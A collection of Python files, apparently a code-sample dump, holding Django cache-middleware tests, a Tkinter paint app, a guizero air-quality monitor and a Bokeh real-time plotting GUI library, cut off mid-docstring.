    """Trivial view used by the middleware tests: echoes *value* in the body."""
    body = 'Hello World %s' % value
    return HttpResponse(body)
def csrf_view(request):
    """View whose response body is just the CSRF token for the request."""
    token = csrf(request)['csrf_token']
    return HttpResponse(token)
@override_settings(
    CACHE_MIDDLEWARE_ALIAS='other',
    CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
    CACHE_MIDDLEWARE_SECONDS=30,
    CACHES={
        'default': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
        },
        'other': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
            'LOCATION': 'other',
            'TIMEOUT': '1',
        },
    },
)
class CacheMiddlewareTest(SimpleTestCase):
    """Tests for CacheMiddleware, both used directly as middleware and as the
    implementation behind the cache_page() view decorator."""

    def setUp(self):
        super(CacheMiddlewareTest, self).setUp()
        self.factory = RequestFactory()
        self.default_cache = caches['default']
        self.other_cache = caches['other']

    def tearDown(self):
        # Clear both configured caches so tests stay independent.
        self.default_cache.clear()
        self.other_cache.clear()
        super(CacheMiddlewareTest, self).tearDown()

    def test_constructor(self):
        """
        Ensure the constructor is correctly distinguishing between usage of CacheMiddleware as
        Middleware vs. usage of CacheMiddleware as view decorator and setting attributes
        appropriately.
        """
        # If no arguments are passed in construction, it's being used as middleware.
        middleware = CacheMiddleware()
        # Now test object attributes against values defined in setUp above
        self.assertEqual(middleware.cache_timeout, 30)
        self.assertEqual(middleware.key_prefix, 'middlewareprefix')
        self.assertEqual(middleware.cache_alias, 'other')
        # If arguments are being passed in construction, it's being used as a decorator.
        # First, test with "defaults":
        as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None)
        self.assertEqual(as_view_decorator.cache_timeout, 30)  # Timeout value for 'default' cache, i.e. 30
        self.assertEqual(as_view_decorator.key_prefix, '')
        # Value of DEFAULT_CACHE_ALIAS from django.core.cache
        self.assertEqual(as_view_decorator.cache_alias, 'default')
        # Next, test with custom values:
        as_view_decorator_with_custom = CacheMiddleware(cache_timeout=60, cache_alias='other', key_prefix='foo')
        self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
        self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
        self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')

    def test_middleware(self):
        """Responses are cached per key prefix; timeout doesn't affect the key."""
        middleware = CacheMiddleware()
        prefix_middleware = CacheMiddleware(key_prefix='prefix1')
        timeout_middleware = CacheMiddleware(cache_timeout=1)
        request = self.factory.get('/view/')
        # Put the request through the request middleware
        result = middleware.process_request(request)
        self.assertIsNone(result)
        response = hello_world_view(request, '1')
        # Now put the response through the response middleware
        response = middleware.process_response(request, response)
        # Repeating the request should result in a cache hit
        result = middleware.process_request(request)
        self.assertIsNotNone(result)
        self.assertEqual(result.content, b'Hello World 1')
        # The same request through a different middleware won't hit
        result = prefix_middleware.process_request(request)
        self.assertIsNone(result)
        # The same request with a timeout _will_ hit
        result = timeout_middleware.process_request(request)
        self.assertIsNotNone(result)
        self.assertEqual(result.content, b'Hello World 1')

    def test_view_decorator(self):
        """cache_page() honors per-decorator timeout, cache alias and key prefix."""
        # decorate the same view with different cache decorators
        default_view = cache_page(3)(hello_world_view)
        default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
        explicit_default_view = cache_page(3, cache='default')(hello_world_view)
        explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
        other_view = cache_page(1, cache='other')(hello_world_view)
        other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
        request = self.factory.get('/view/')
        # Request the view once
        response = default_view(request, '1')
        self.assertEqual(response.content, b'Hello World 1')
        # Request again -- hit the cache
        response = default_view(request, '2')
        self.assertEqual(response.content, b'Hello World 1')
        # Requesting the same view with the explicit cache should yield the same result
        response = explicit_default_view(request, '3')
        self.assertEqual(response.content, b'Hello World 1')
        # Requesting with a prefix will hit a different cache key
        response = explicit_default_with_prefix_view(request, '4')
        self.assertEqual(response.content, b'Hello World 4')
        # Hitting the same view again gives a cache hit
        response = explicit_default_with_prefix_view(request, '5')
        self.assertEqual(response.content, b'Hello World 4')
        # And going back to the implicit cache will hit the same cache
        response = default_with_prefix_view(request, '6')
        self.assertEqual(response.content, b'Hello World 4')
        # Requesting from an alternate cache won't hit cache
        response = other_view(request, '7')
        self.assertEqual(response.content, b'Hello World 7')
        # But a repeated hit will hit cache
        response = other_view(request, '8')
        self.assertEqual(response.content, b'Hello World 7')
        # And prefixing the alternate cache yields yet another cache entry
        response = other_with_prefix_view(request, '9')
        self.assertEqual(response.content, b'Hello World 9')
        # But if we wait a couple of seconds...
        time.sleep(2)
        # ... the default cache will still hit
        # (FIX: removed a stray no-op statement -- a bare ``caches['default']``
        # expression that had no effect.)
        response = default_view(request, '11')
        self.assertEqual(response.content, b'Hello World 1')
        # ... the default cache with a prefix will still hit
        response = default_with_prefix_view(request, '12')
        self.assertEqual(response.content, b'Hello World 4')
        # ... the explicit default cache will still hit
        response = explicit_default_view(request, '13')
        self.assertEqual(response.content, b'Hello World 1')
        # ... the explicit default cache with a prefix will still hit
        response = explicit_default_with_prefix_view(request, '14')
        self.assertEqual(response.content, b'Hello World 4')
        # .. but a rapidly expiring cache won't hit
        response = other_view(request, '15')
        self.assertEqual(response.content, b'Hello World 15')
        # .. even if it has a prefix
        response = other_with_prefix_view(request, '16')
        self.assertEqual(response.content, b'Hello World 16')

    def test_sensitive_cookie_not_cached(self):
        """
        Django must prevent caching of responses that set a user-specific (and
        maybe security sensitive) cookie in response to a cookie-less request.
        """
        csrf_middleware = CsrfViewMiddleware()
        cache_middleware = CacheMiddleware()
        request = self.factory.get('/view/')
        self.assertIsNone(cache_middleware.process_request(request))
        csrf_middleware.process_view(request, csrf_view, (), {})
        response = csrf_view(request)
        response = csrf_middleware.process_response(request, response)
        response = cache_middleware.process_response(request, response)
        # Inserting a CSRF cookie in a cookie-less request prevented caching.
        self.assertIsNone(cache_middleware.process_request(request))
@override_settings(
    CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
    CACHE_MIDDLEWARE_SECONDS=1,
    CACHES={
        'default': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
        },
    },
    USE_I18N=False,
)
class TestWithTemplateResponse(SimpleTestCase):
    """
    Tests various headers w/ TemplateResponse.
    Most are probably redundant since they manipulate the same object
    anyway but the Etag header is 'special' because it relies on the
    content being complete (which is not necessarily always the case
    with a TemplateResponse)
    """
    def setUp(self):
        self.path = '/cache/test/'
        self.factory = RequestFactory()

    def tearDown(self):
        cache.clear()

    def test_patch_vary_headers(self):
        """patch_vary_headers() merges new names into Vary case-insensitively."""
        headers = (
            # Initial vary, new headers, resulting vary.
            (None, ('Accept-Encoding',), 'Accept-Encoding'),
            ('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
            ('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
            ('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
            ('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
            ('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
            (None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
            ('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
            ('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
        )
        for initial_vary, newheaders, resulting_vary in headers:
            template = engines['django'].from_string("This is a test")
            response = TemplateResponse(HttpRequest(), template)
            if initial_vary is not None:
                response['Vary'] = initial_vary
            patch_vary_headers(response, newheaders)
            self.assertEqual(response['Vary'], resulting_vary)

    def test_get_cache_key(self):
        """learn_cache_key()/get_cache_key() round-trip, honoring key_prefix."""
        request = self.factory.get(self.path)
        template = engines['django'].from_string("This is a test")
        response = TemplateResponse(HttpRequest(), template)
        key_prefix = 'localprefix'
        # Expect None if no headers have been set yet.
        self.assertIsNone(get_cache_key(request))
        # Set headers to an empty list.
        learn_cache_key(request, response)
        # NOTE: the literal hashes below are tightly coupled to the cache-key
        # implementation; they act as regression values.
        self.assertEqual(
            get_cache_key(request),
            'views.decorators.cache.cache_page.settingsprefix.GET.'
            '58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
        )
        # Verify that a specified key_prefix is taken into account.
        learn_cache_key(request, response, key_prefix=key_prefix)
        self.assertEqual(
            get_cache_key(request, key_prefix=key_prefix),
            'views.decorators.cache.cache_page.localprefix.GET.'
            '58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
        )

    def test_get_cache_key_with_query(self):
        """The query string contributes to the cache key."""
        request = self.factory.get(self.path, {'test': 1})
        template = engines['django'].from_string("This is a test")
        response = TemplateResponse(HttpRequest(), template)
        # Expect None if no headers have been set yet.
        self.assertIsNone(get_cache_key(request))
        # Set headers to an empty list.
        learn_cache_key(request, response)
        # Verify that the querystring is taken into account.
        self.assertEqual(
            get_cache_key(request),
            'views.decorators.cache.cache_page.settingsprefix.GET.'
            '0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
        )

    @override_settings(USE_ETAGS=False)
    def test_without_etag(self):
        """No ETag header is added when USE_ETAGS is off, even after render."""
        template = engines['django'].from_string("This is a test")
        response = TemplateResponse(HttpRequest(), template)
        self.assertFalse(response.has_header('ETag'))
        patch_response_headers(response)
        self.assertFalse(response.has_header('ETag'))
        response = response.render()
        self.assertFalse(response.has_header('ETag'))

    @override_settings(USE_ETAGS=True)
    def test_with_etag(self):
        """The ETag only appears once the template response has been rendered."""
        template = engines['django'].from_string("This is a test")
        response = TemplateResponse(HttpRequest(), template)
        self.assertFalse(response.has_header('ETag'))
        patch_response_headers(response)
        # Still unset: the content isn't complete until render().
        self.assertFalse(response.has_header('ETag'))
        response = response.render()
        self.assertTrue(response.has_header('ETag'))
class TestMakeTemplateFragmentKey(SimpleTestCase):
    """Regression values for make_template_fragment_key()."""
    def test_without_vary_on(self):
        key = make_template_fragment_key('a.fragment')
        # d41d8cd9... is the well-known MD5 of the empty string (no vary_on).
        self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')

    def test_with_one_vary_on(self):
        key = make_template_fragment_key('foo', ['abc'])
        self.assertEqual(key,
                         'template.cache.foo.900150983cd24fb0d6963f7d28e17f72')

    def test_with_many_vary_on(self):
        key = make_template_fragment_key('bar', ['abc', 'def'])
        self.assertEqual(key,
                         'template.cache.bar.4b35f12ab03cec09beec4c21b2d2fa88')

    def test_proper_escaping(self):
        # Special characters (':', '%') in vary_on values must not be able to
        # collide with the key's internal separators.
        key = make_template_fragment_key('spam', ['abc:def%'])
        self.assertEqual(key,
                         'template.cache.spam.f27688177baec990cdf3fbd9d9c3f469')
class CacheHandlerTest(SimpleTestCase):
    """Tests for the ``caches`` connection handler."""
    def test_same_instance(self):
        """
        Attempting to retrieve the same alias should yield the same instance.
        """
        cache1 = caches['default']
        cache2 = caches['default']
        self.assertIs(cache1, cache2)

    def test_per_thread(self):
        """
        Requesting the same alias from separate threads should yield separate
        instances.
        """
        c = []
        def runner():
            # Each thread appends the connection it sees for 'default'.
            c.append(caches['default'])
        # Run two threads sequentially (start + join) so c has two entries.
        for x in range(2):
            t = threading.Thread(target=runner)
            t.start()
            t.join()
        self.assertIsNot(c[0], c[1])
|
from tkinter import *
from tkinter import messagebox
from tkinter.colorchooser import askcolor
import threading
import time
from PIL import Image
import os
class Paint(object):
    """Simple Tk paint window that can also replay draw events from a queue.

    Parameters (via __init__): w/h -- canvas size in pixels; q -- a queue of
    paint events consumed by a background thread (each item needs .x / .y).
    """

    DEFAULT_PEN_SIZE = 5.0
    DEFAULT_COLOR = 'black'
    # Idle time (ns) after which a queued event starts a new stroke.
    DEFAULT_DELAY = 5 * pow(10, 8)

    def __init__(self, w, h, q):
        self.root = Tk()
        self.q = q
        self.time = time.time_ns()
        self.pen_button = Button(self.root, text='pen', command=self.use_pen)
        self.pen_button.grid(row=0, column=0)
        self.color_button = Button(self.root, text='color', command=self.choose_color)
        self.color_button.grid(row=0, column=1)
        self.eraser_button = Button(self.root, text='eraser', command=self.use_eraser)
        self.eraser_button.grid(row=0, column=2)
        self.save_button = Button(self.root, text='save', command=self.save)
        self.save_button.grid(row=0, column=3)
        self.choose_size_button = Scale(self.root, from_=1, to=10, orient=HORIZONTAL)
        self.choose_size_button.grid(row=0, column=4)
        self.c = Canvas(self.root, bg='white', width=w, height=h)
        self.c.grid(row=1, columnspan=5)
        self.setup()
        # BUG FIX: Thread(...).start() returns None, so the original stored
        # None in self.t. Keep the thread object and mark it daemon so a
        # blocking q.get() cannot keep the process alive after the window
        # closes.
        self.t = threading.Thread(target=self.handle, daemon=True)
        self.t.start()
        self.root.mainloop()

    def handle(self):
        """Consume paint events from the queue forever and draw them."""
        while True:
            event = self.q.get()
            self.paint(event)
            self.time = time.time_ns()

    def save(self, filename=None):
        """Export the canvas to <filename>.png (default: current unix time).

        BUG FIX: the original default, str(int(time.time())), was evaluated
        once at class-definition time and the parameter was never used in the
        file paths; the name is now computed per call and actually used.
        """
        if filename is None:
            filename = str(int(time.time()))
        self.c.postscript(file=f"{filename}.eps")
        img = Image.open(f"{filename}.eps")
        img.save(f"{filename}.png", "png")
        os.remove(f"{filename}.eps")
        messagebox.showinfo("Saved", f"Saved canvas to {filename}.png!!!")

    def setup(self):
        """Initialise drawing state and bind mouse events to the canvas."""
        self.old_x = None
        self.old_y = None
        self.line_width = self.choose_size_button.get()
        self.color = self.DEFAULT_COLOR
        self.eraser_on = False
        self.active_button = self.pen_button
        self.c.bind('<B1-Motion>', self.paint)
        self.c.bind('<ButtonRelease-1>', self.reset)

    def use_pen(self):
        self.activate_button(self.pen_button)

    def use_brush(self):
        # NOTE(review): the brush button is not created in __init__, so
        # calling this would raise AttributeError -- confirm before wiring up.
        self.activate_button(self.brush_button)

    def choose_color(self):
        self.eraser_on = False
        self.color = askcolor(color=self.color)[1]

    def use_eraser(self):
        self.activate_button(self.eraser_button, eraser_mode=True)

    def activate_button(self, some_button, eraser_mode=False):
        """Visually select *some_button* and toggle eraser mode."""
        self.active_button.config(relief=RAISED)
        some_button.config(relief=SUNKEN)
        self.active_button = some_button
        self.eraser_on = eraser_mode

    def paint(self, event):
        """Draw a line segment from the previous point to the event point."""
        diff = time.time_ns() - self.time
        if diff > self.DEFAULT_DELAY:
            # Too much idle time: treat this event as the start of a new
            # stroke instead of connecting it to a stale previous point.
            self.reset(None)
            return
        self.line_width = self.choose_size_button.get()
        paint_color = 'white' if self.eraser_on else self.color
        # BUG FIX: compare against None -- the original truthiness test
        # skipped segments whenever the previous coordinate was 0.
        if self.old_x is not None and self.old_y is not None:
            self.c.create_line(self.old_x, self.old_y, event.x, event.y,
                               width=self.line_width, fill=paint_color,
                               capstyle=ROUND, smooth=TRUE, splinesteps=36)
        self.old_x = event.x
        self.old_y = event.y

    def reset(self, event):
        """Forget the previous point so the next paint() starts a new stroke."""
        self.old_x, self.old_y = None, None
if __name__ == '__main__':
    # BUG FIX: Paint.__init__ requires (w, h, q); the bare Paint() call
    # raised TypeError. Supply a canvas size and an (initially empty) event
    # queue for the background handler thread.
    import queue
    Paint(600, 400, queue.Queue())
|
import threading
import time
from guizero import App, Text, Slider
from aq import AQ

aq = AQ()
app = App(title="Air Quality", width=550, height=400, layout="grid")

def update_readings():  # update fields with new temp and eCO2 readings
    """Poll the sensor twice a second and update the UI. While eCO2 exceeds
    the alarm slider value, turn the window red and sound the buzzer."""
    while True:
        temp_c_field.value = str(aq.get_temp())
        eco2 = aq.get_eco2()
        eco2_field.value = str(eco2)
        if eco2 > slider.value:
            app.bg = "red"
            app.text_color = "white"
            aq.buzzer_on()
        else:
            app.bg = "white"
            app.text_color = "black"
            aq.buzzer_off()
        time.sleep(0.5)

aq.leds_automatic()

# define the user interface
Text(app, text="Temp (C)", grid=[0,0], size=20)
temp_c_field = Text(app, text="-", grid=[1,0], size=100)
Text(app, text="eCO2 (ppm)", grid=[0,1], size=20)
eco2_field = Text(app, text="-", grid=[1,1], size=100)
Text(app, text="Alarm (ppm)", grid=[0,2], size=20)
slider = Slider(app, start=300, end=2000, width=300, height=40, grid=[1,2])

# BUG FIX: start the reader thread only after the widgets it updates exist;
# the original started it before temp_c_field/eco2_field/slider were defined,
# racing a NameError. daemon=True lets the process exit when the GUI closes.
t1 = threading.Thread(target=update_readings, daemon=True)
t1.start()  # start the thread that updates the readings

app.display()
|
#!/usr/bin/env python3
import sys
import queue
from datetime import datetime
import itertools
import threading
from functools import partial
import asyncio
import socket
from bokeh.server.server import Server
from bokeh.application import Application
from bokeh.application.handlers.function import FunctionHandler
from bokeh.plotting import figure, ColumnDataSource
from bokeh.models import Range1d
from bokeh.palettes import Category20_20 as palette
from bokeh.plotting import save, output_file
from bokeh.layouts import gridplot, column, row
from bokeh.models.widgets import CheckboxGroup
from bokeh.models.widgets.buttons import Button
from bokeh.models.widgets import TextInput
from bokeh.models import TextAreaInput
from bokeh.models import Panel, Tabs
from bokeh.models import DataTable, TableColumn
from bokeh.models import CustomJS
from bokeh import events
class UpdateEvent(object):
    """@brief Holds the state of an event sent from a non-GUI thread into the
              GUI thread context so the GUI can be updated there. The details
              of these updates are specific to the GUI implemented, so this
              class should be extended with the events each GUI needs."""

    # Example event ID: refresh the GUI status line to give the user feedback
    # on the current state of the GUI.
    UPDATE_STATUS_TEXT = 1

    def __init__(self, id, argList=None):
        """@brief Constructor
           @param id An integer event ID
           @param argList A list of arguments associated with the event"""
        # Essentially a holder class: attributes are intentionally public.
        self.argList = argList
        self.id = id
class TimeSeriesPoint(object):
    """@brief Holds one time-stamped value destined for a single plot trace."""

    def __init__(self, traceIndex, value, timeStamp=None):
        """@brief Constructor
           @param traceIndex The index of the trace this reading should be
                  applied to. Index 0 is the first trace added via
                  TimeSeriesPlotter.addTrace(); it increments per addTrace().
           @param value The Y value.
           @param timeStamp The X value; defaults to datetime.now() when not
                  supplied."""
        self.traceIndex = traceIndex
        self.time = timeStamp if timeStamp else datetime.now()
        self.value = value
class TabbedGUI(object):
    """@brief A generalised base class responsible for plotting real time data
              in a tabbed bokeh document."""

    @staticmethod
    def GetFigure(title=None, yAxisName=None, yRangeLimits=None, width=400, height=400):
        """@brief A Factory method to obtain a figure instance.
                  A figure is a single plot area that can contain multiple traces.
           @param title The title of the figure.
           @param yAxisName The name of the Y axis.
           @param yRangeLimits If None then the Y axis will auto range.
                  If a list of two numerical values then this
                  defines the min and max Y axis range values.
           @param width The width of the plot area in pixels.
           @param height The height of the plot area in pixels.
           @return A figure instance."""
        if yRangeLimits and len(yRangeLimits) == 2:
            yrange = Range1d(yRangeLimits[0], yRangeLimits[1])
        else:
            # Let bokeh auto-range the Y axis.
            yrange = None
        fig = figure(title=title,
                     x_axis_type="datetime",
                     x_axis_location="below",
                     y_range=yrange,
                     plot_width=width,
                     plot_height=height)
        fig.yaxis.axis_label = yAxisName
        return fig

    def __init__(self, docTitle, bokehPort=9090):
        """@brief Constructor.
           @param docTitle The document title.
           @param bokehPort The port to run the server on."""
        self._docTitle=docTitle
        self._bokehPort=bokehPort
        self._doc = None
        self._tabList = []
        self._server = None

    def stopServer(self):
        """@brief Stop the bokeh server by exiting the process."""
        sys.exit()

    def isServerRunning(self):
        """@brief Check if the server is running.
           @return True if the server is running. It may take some time (~ 20 seconds)
                   after the browser is closed before the server session shuts down."""
        serverSessions = "not started"
        if self._server:
            serverSessions = self._server.get_sessions()
        # An empty session list means every browser session has closed.
        serverRunning = True
        if not serverSessions:
            serverRunning = False
        return serverRunning

    def runBokehServer(self):
        """@brief Run the bokeh server. This is a blocking method."""
        apps = {'/': Application(FunctionHandler(self.createPlot))}
        self._server = Server(apps, port=self._bokehPort)
        self._server.show("/")
        self._server.run_until_shutdown()

    def _run(self, method, args=()):
        """@brief Run a method in a separate thread. This is useful when
                  methods are called from gui events that take some time to execute.
                  For such methods the gui callback should call this method to execute
                  the time consuming methods in another thread.
           @param method The method to execute.
           @param args A tuple of arguments to pass to the method.
                  If no arguments are required then an empty tuple should be passed.

        BUG FIX: the default was a mutable list (``args=[]``); it is now the
        empty tuple the docstring always promised. Passing a list still works.
        """
        thread = threading.Thread(target=method, args=args)
        thread.start()

    def _sendUpdateEvent(self, updateEvent):
        """@brief Send an event to the GUI context to update the GUI. When methods
                  are executing outside the gui thread but need to update the state
                  of the GUI, events must be sent to the gui context in order to update
                  the gui elements when they have the correct locks.
           @param updateEvent An UpdateEvent instance."""
        self._doc.add_next_tick_callback( partial(self._rxUpdateEvent, updateEvent) )

    def _rxUpdateEvent(self, updateEvent):
        """@brief Receive an event into the GUI context to update the GUI.
           @param updateEvent An UpdateEvent instance. This method will
                  be specific to the GUI implemented and must therefore
                  be overridden in child classes."""
        raise Exception("BUG: The _rxUpdateEvent() method must be implemented by classes that are children of the TabbedGUI class.")
class TimeSeriesPlotter(TabbedGUI):
    """@brief Responsible for plotting data on tab 0 with no other tabs."""

    def __init__(self, docTitle, bokehPort=9091, topCtrlPanel=True):
        """@brief Constructor
           @param docTitle The document title.
           @param bokehPort The port to run the server on.
           @param topCtrlPanel If True then a control panel is displayed at the top of the plot."""
        super().__init__(docTitle, bokehPort=bokehPort)
        self._statusAreaInput = None
        self._figTable=[[]]
        self._grid = None
        self._topCtrlPanel=topCtrlPanel
        self._srcList = []
        self._colors = itertools.cycle(palette)
        # Thread-safe queue decouples producers (any thread) from the
        # periodic GUI-thread update callback.
        self._queue = queue.Queue()
        self._plottingEnabled = True

    def addTrace(self, fig, legend_label, line_color=None, line_width=1):
        """@brief Add a trace to a figure.
           @param fig The figure to add the trace to.
           @param legend_label The text of the label.
           @param line_color The line color. Auto-allocated from the palette when None.
           @param line_width The trace line width."""
        src = ColumnDataSource({'x': [], 'y': []})
        # Allocate a line color if one is not defined
        if not line_color:
            line_color = next(self._colors)
        fig.line(source=src,
                 line_color = line_color,
                 legend_label = legend_label,
                 line_width = line_width)
        # The position in this list is the trace index used by addValue().
        self._srcList.append(src)

    def _update(self):
        """@brief Called periodically (in the GUI thread) to drain the queue
                  and stream queued points into their trace sources."""
        if self._plottingEnabled:
            while not self._queue.empty():
                timeSeriesPoint = self._queue.get()
                new = {'x': [timeSeriesPoint.time],
                       'y': [timeSeriesPoint.value]}
                source = self._srcList[timeSeriesPoint.traceIndex]
                source.stream(new)

    def addValue(self, traceIndex, value, timeStamp=None):
        """@brief Add a value to be plotted. This adds to the queue of values
                  to be plotted the next time _update() is called.
           @param traceIndex The index of the trace this reading should be applied to.
           @param value The Y value to be plotted.
           @param timeStamp The timestamp associated with the value. If not supplied
                  then the timestamp will be created at the time when this
                  method is called."""
        timeSeriesPoint = TimeSeriesPoint(traceIndex, value, timeStamp=timeStamp)
        self._queue.put(timeSeriesPoint)

    def addRow(self):
        """@brief Add an empty row to the figures."""
        self._figTable.append([])

    def addToRow(self, fig):
        """@brief Add a figure to the end of the current row of figures.
           @param fig The figure to add."""
        self._figTable[-1].append(fig)

    def createPlot(self, doc, ):
        """@brief Create a plot figure.
           @param doc The document to add the plot to."""
        self._doc = doc
        self._doc.title = self._docTitle
        plotPanel = self._getPlotPanel()
        self._tabList.append( Panel(child=plotPanel, title="Plots") )
        self._doc.add_root( Tabs(tabs=self._tabList) )
        # Drain the point queue every 100 ms in the GUI thread.
        self._doc.add_periodic_callback(self._update, 100)

    def _getPlotPanel(self):
        """@brief Build the panel holding the plot grid and, optionally, the
                  top control row (plot enable, save, quit) plus status bar."""
        self._grid = gridplot(children = self._figTable, sizing_mode = 'scale_both', toolbar_location='left')
        if self._topCtrlPanel:
            checkbox1 = CheckboxGroup(labels=["Plot Data"], active=[0, 1],max_width=70)
            checkbox1.on_change('active', self._checkboxHandler)
            self._fileToSave = TextInput(title="File to save", max_width=150)
            saveButton = Button(label="Save", button_type="success", width=50)
            saveButton.on_click(self._savePlot)
            shutDownButton = Button(label="Quit", button_type="success", width=50)
            shutDownButton.on_click(self.stopServer)
            self._statusBarWrapper = StatusBarWrapper()
            plotRowCtrl = row(children=[checkbox1, saveButton, self._fileToSave, shutDownButton])
            plotPanel = column([plotRowCtrl, self._grid, self._statusBarWrapper.getWidget()])
        else:
            plotPanel = column([self._grid])
        return plotPanel

    def _savePlot(self):
        """@brief Save plot to a single html file. This allows the plots to be
                  analysed later."""
        if self._fileToSave and self._fileToSave.value:
            if self._fileToSave.value.endswith(".html"):
                filename = self._fileToSave.value
            else:
                filename = self._fileToSave.value + ".html"
            output_file(filename)
            # Save all the plots in the grid to an html file that allows
            # display in a browser and plot manipulation.
            save( self._grid )
            self._statusBarWrapper.setStatus("Saved {}".format(filename))

    def _checkboxHandler(self, attr, old, new):
        """@brief Called when the checkbox is clicked.
           @param attr The name of the changed attribute.
           @param old The previous value.
           @param new The new value (list of active checkbox indexes)."""
        if 0 in list(new):  # Is first checkbox selected
            self._plottingEnabled = True
            self._statusBarWrapper.setStatus("Plotting enabled")
        else:
            self._plottingEnabled = False
            self._statusBarWrapper.setStatus("Plotting disabled")

    def runNonBlockingBokehServer(self):
        """@brief Run the bokeh server in a separate thread. This is useful
                  if we want to load realtime data into the plot from the
                  main thread."""
        self._serverThread = threading.Thread(target=self._runBokehServer)
        # FIX: Thread.setDaemon() is deprecated (since Python 3.10); assign
        # the daemon attribute directly. Behavior is unchanged.
        self._serverThread.daemon = True
        self._serverThread.start()

    def _runBokehServer(self):
        """@brief Run the bokeh server. This is called when the bokeh server is executed in a thread."""
        apps = {'/': Application(FunctionHandler(self.createPlot))}
        # As this gets run in a thread we need to start an event loop
        evtLoop = asyncio.new_event_loop()
        asyncio.set_event_loop(evtLoop)
        self._server = Server(apps, port=self._bokehPort)
        self._server.start()
        # Show the server in a web browser window
        self._server.io_loop.add_callback(self._server.show, "/")
        self._server.io_loop.start()
class StatusBarWrapper(object):
    """@brief Responsible for presenting a single status line of text in a GUI
              that runs the width of the page (normally at the bottom)."""
    def __init__(self):
        # A one-column, headerless DataTable acts as the status line.
        data = dict(
            status = [],
        )
        self.source = ColumnDataSource(data)
        columns = [
                TableColumn(field="status", title="status"),
            ]
        self.statusBar = DataTable(source=self.source, columns=columns, height_policy="fixed", height=50, header_row=False, index_position=None)

    def getWidget(self):
        """@brief Return an instance of the status bar widget to be added to a layout."""
        return self.statusBar

    def setStatus(self, msg):
        """@brief Set the message in the status bar.
           @param msg The message to be displayed."""
        # Replacing source.data triggers the on-screen update.
        self.source.data = {"status": [msg]}
class ReadOnlyTableWrapper(object):
    """@brief Responsible for presenting a table of values that can be updated dynamically."""
    def __init__(self, columnNameList, height=400, heightPolicy="auto", showLastRows=0, index_position=None):
        """@brief Constructor
           @param columnNameList A List of strings denoting each column in the 2 dimensional table.
           @param height The height of the table viewport in pixels.
           @param heightPolicy The height policy (auto, fixed, fit, min, max). default=auto.
           @param showLastRows The number of rows to show in the table. If set to 2 then only
                  the last two rows in the table are displayed but they are scrolled into view.
                  The default=0 which will display all rows and will not scroll the latest
                  into view.
           @param index_position The position of the index column in the table. 0 = the first
                  column. Default is None which does not display the index column."""
        self._columnNameList = columnNameList
        self._dataDict = {}
        self._columns = []
        for columnName in columnNameList:
            self._dataDict[columnName]=[]
            self._columns.append( TableColumn(field=columnName, title=columnName) )
        self._source = ColumnDataSource(self._dataDict)
        # frozen_rows=-showLastRows keeps only the trailing rows in view.
        self._dataTable = DataTable(source=self._source, columns=self._columns, height=height, height_policy=heightPolicy, frozen_rows=-showLastRows, index_position=index_position)

    def getWidget(self):
        """@brief Return an instance of the DataTable widget to be added to a layout."""
        return self._dataTable

    def setRows(self, rowList):
        """@brief Replace the entire contents of the table.
           @param rowList A list of rows of data. Each row must contain a list of values for each column in the table."""
        # Validate every row length before touching the data source.
        for _row in rowList:
            if len(_row) != len(self._columnNameList):
                raise Exception("{} row should have {} values.".format(_row, len(self._columnNameList)))
        # Re-shape the row-major input into the column-major dict bokeh expects.
        dataDict = {}
        colIndex = 0
        for columnName in self._columnNameList:
            valueList = []
            for _row in rowList:
                valueList.append( _row[colIndex] )
            dataDict[columnName]=valueList
            colIndex = colIndex + 1
        self._source.data = dataDict

    def appendRow(self, _row):
        """@brief Append a single row to the end of the table.
           @param _row A list holding one value per column, in column order."""
        dataDict = {}
        colIndex = 0
        for columnName in self._columnNameList:
            valueList = [_row[colIndex]]
            dataDict[columnName]=valueList
            colIndex = colIndex + 1
        # stream() appends to the existing source data rather than replacing it.
        self._source.stream(dataDict)
class AlertButtonWrapper(object):
    """@brief A button that pops up a javascript alert dialog when clicked."""

    def __init__(self, buttonLabel, alertMessage, buttonType="default", onClickMethod=None):
        """@brief Constructor
           @param buttonLabel The text displayed on the button.
           @param alertMessage The message displayed in the alert dialog when clicked.
           @param buttonType The type of button to display (default, primary, success, warning, danger, light).
           @param onClickMethod An optional method that is called when the alert OK button has been clicked."""
        self._button = Button(label=buttonLabel, button_type=buttonType)
        if onClickMethod:
            self.addOnClickMethod(onClickMethod)
        # Client-side callback: show the message in a browser alert box.
        jsCallback = CustomJS(args=dict(source={"msg": alertMessage}), code="""
var msg = source['msg']
alert(msg);
""")
        self._button.js_on_event(events.ButtonClick, jsCallback)

    def addOnClickMethod(self, onClickMethod):
        """@brief Register a server-side method invoked after the alert dialog has been displayed.
           @param onClickMethod The method that is called."""
        self._button.on_click(onClickMethod)

    def getWidget(self):
        """@brief Return the button widget to be added to a layout."""
        return self._button
class ShutdownButtonWrapper(object):
    """@brief A shutdown ('Quit') button. When clicked it shows an alert
              instructing the user to close the browser window; confirming
